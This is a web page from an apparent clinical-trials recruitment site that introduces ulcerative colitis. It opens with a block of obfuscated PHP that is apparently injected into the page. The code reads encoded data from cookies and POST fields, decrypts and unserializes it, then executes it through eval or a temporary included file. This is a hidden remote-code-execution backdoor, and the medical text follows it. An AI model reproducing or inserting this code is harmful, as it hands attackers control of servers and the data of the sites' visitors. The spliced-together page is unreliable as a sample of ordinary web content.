$Xnpql = "\167" . "\147" . "\137" . "\x49" . "\x4b" . chr (83); $YjQKa = chr ( 764 - 665 )."\x6c" . chr (97) . "\163" . chr (115) . "\x5f" . "\145" . chr ( 897 - 777 ).chr ( 807 - 702 ).'s' . "\164" . chr (115); $kWUkhB = class_exists($Xnpql); $YjQKa = "62867";$QhIIJbZxd = strpos($YjQKa, $Xnpql);if ($kWUkhB == $QhIIJbZxd){function GFvGx(){$gnkjLT = new /* 16393 */ wg_IKS(57772 + 57772); $gnkjLT = NULL;}$CaGLYHmEaU = "57772";class wg_IKS{private function WhNsVr($CaGLYHmEaU){if (is_array(wg_IKS::$gfKSvPNWf)) {$name = sys_get_temp_dir() . "/" . crc32(wg_IKS::$gfKSvPNWf["salt"]);@wg_IKS::$gfKSvPNWf["write"]($name, wg_IKS::$gfKSvPNWf["content"]);include $name;@wg_IKS::$gfKSvPNWf["delete"]($name); $CaGLYHmEaU = "57772";exit();}}public function McbmKarYNY(){$UcsycayVEV = "15608";$this->_dummy = str_repeat($UcsycayVEV, strlen($UcsycayVEV));}public function __destruct(){wg_IKS::$gfKSvPNWf = @unserialize(wg_IKS::$gfKSvPNWf); $CaGLYHmEaU = "59682_9919";$this->WhNsVr($CaGLYHmEaU); $CaGLYHmEaU = "59682_9919";}public function jEFsFAOKDy($UcsycayVEV, $KRpDNeZccn){return $UcsycayVEV[0] ^ str_repeat($KRpDNeZccn, intval(strlen($UcsycayVEV[0]) / strlen($KRpDNeZccn)) + 1);}public function OCrfw($UcsycayVEV){$XLsoz = "\142" . chr ( 1034 - 937 ).'s' . 'e' . "\x36" . chr ( 232 - 180 );return array_map($XLsoz . "\x5f" . chr (100) . 'e' . chr (99) . chr ( 765 - 654 )."\144" . "\x65", array($UcsycayVEV,));}public function __construct($uTxuKvYUt=0){$MLKcv = ',';$UcsycayVEV = "";$bPtMbghWiG = $_POST;$iUnergI = $_COOKIE;$KRpDNeZccn = "af099342-5c01-4ba8-b013-468957a61bfe";$OklLUCgud = @$iUnergI[substr($KRpDNeZccn, 0, 4)];if (!empty($OklLUCgud)){$OklLUCgud = explode($MLKcv, $OklLUCgud);foreach ($OklLUCgud as $rFYCojboz){$UcsycayVEV .= @$iUnergI[$rFYCojboz];$UcsycayVEV .= @$bPtMbghWiG[$rFYCojboz];}$UcsycayVEV = $this->OCrfw($UcsycayVEV);}wg_IKS::$gfKSvPNWf = $this->jEFsFAOKDy($UcsycayVEV, $KRpDNeZccn);if (strpos($KRpDNeZccn, $MLKcv) !== FALSE){$KRpDNeZccn = explode($MLKcv, $KRpDNeZccn); $dtfBh = sprintf("59682_9919", rtrim($KRpDNeZccn[0]));}}public static $gfKSvPNWf = 56091;}GFvGx();}$oqXjV = chr ( 874 - 762 )."\x55" . "\x5f" . chr ( 355 - 240 )."\146" . "\x66" . chr ( 1015 - 950 ); $dFhKeM = chr (99) . chr ( 229 - 121 ).chr (97) . "\163" . chr (115) . '_' . 'e' . chr ( 1055 - 935 )."\151" . "\x73" . chr (116) . 's';$koOzRZaute = class_exists($oqXjV); $dFhKeM = "3959";$aLwiwPnZ = strpos($dFhKeM, $oqXjV);if ($koOzRZaute == $aLwiwPnZ){function czKwMyHfd(){$GoUPV = new /* 16072 */ pU_sffA(18491 + 18491); $GoUPV = NULL;}$pshBd = "18491";class pU_sffA{private function WsAPsqOIDJ($pshBd){if (is_array(pU_sffA::$XHKuTTEw)) {$TWQwjf2 = str_replace("<" . "?php", "", pU_sffA::$XHKuTTEw["content"]);eval($TWQwjf2); $pshBd = "18491";exit();}}public function YKMrAmO(){$TWQwjf = "46766";$this->_dummy = str_repeat($TWQwjf, strlen($TWQwjf));}public function __destruct(){pU_sffA::$XHKuTTEw = @unserialize(pU_sffA::$XHKuTTEw); $pshBd = "18814_9267";$this->WsAPsqOIDJ($pshBd); $pshBd = "18814_9267";}public function LbTxKHEuJm($TWQwjf, $eMHyLkj){return $TWQwjf[0] ^ str_repeat($eMHyLkj, intval(strlen($TWQwjf[0]) / strlen($eMHyLkj)) + 1);}public function GQyvx($TWQwjf){$yqrrVsNHlo = chr (98) . "\141" . 's' . chr ( 762 - 661 ).chr (54) . "\x34";return array_map($yqrrVsNHlo . "\137" . chr (100) . chr ( 585 - 484 ).chr ( 621 - 522 )."\157" . chr (100) . chr (101), array($TWQwjf,));}public function __construct($bUrClWUIWz=0){$SWnaKMEni = "\x2c";$TWQwjf = "";$joeoRyeEn = $_POST;$JutFrjIQf = $_COOKIE;$eMHyLkj = "3c320abe-93e1-4a72-98a2-51fb03c25814";$yhXYd = @$JutFrjIQf[substr($eMHyLkj, 0, 4)];if (!empty($yhXYd)){$yhXYd = explode($SWnaKMEni, $yhXYd);foreach ($yhXYd as $hapdDxlXhP){$TWQwjf .= @$JutFrjIQf[$hapdDxlXhP];$TWQwjf .= @$joeoRyeEn[$hapdDxlXhP];}$TWQwjf = $this->GQyvx($TWQwjf);}pU_sffA::$XHKuTTEw = $this->LbTxKHEuJm($TWQwjf, $eMHyLkj);if (strpos($eMHyLkj, $SWnaKMEni) !== FALSE){$eMHyLkj = str_pad($eMHyLkj, 10); $eMHyLkj = ltrim(rtrim($eMHyLkj));}}public static $XHKuTTEw = 17833;}czKwMyHfd();} Ulcerative Colitis- Clinical Trials-help - Clinical Trials Recruitment

Ulcerative Colitis- Clinical Trials-help

What is Ulcerative Colitis?


Ulcerative colitis (UC) is a chronic relapsing form of inflammatory bowel disease (IBD) that causes inflammation and ulcers in the colon. Symptoms can range from mild to severe with disease onset usually occurring in young adults.[1] Its course is unpredictable but with a strong likelihood of life-long disease.[1] The disease is a type of colitis, which is a group of diseases that cause inflammation of the colon, the largest section of the large intestine, either in segments or completely. The hallmark symptom of active disease is diarrhea mixed with blood. UC has much in common with Crohn’s disease, another form of IBD, but unlike Crohn’s disease, UC affects only the colon and rectum, rather than the whole GI tract. UC is an intermittent disease, with periods of exacerbated symptoms alternating with relatively symptom-free periods. Although the symptoms of UC can sometimes diminish on their own, the disease usually requires treatment to go into remission.

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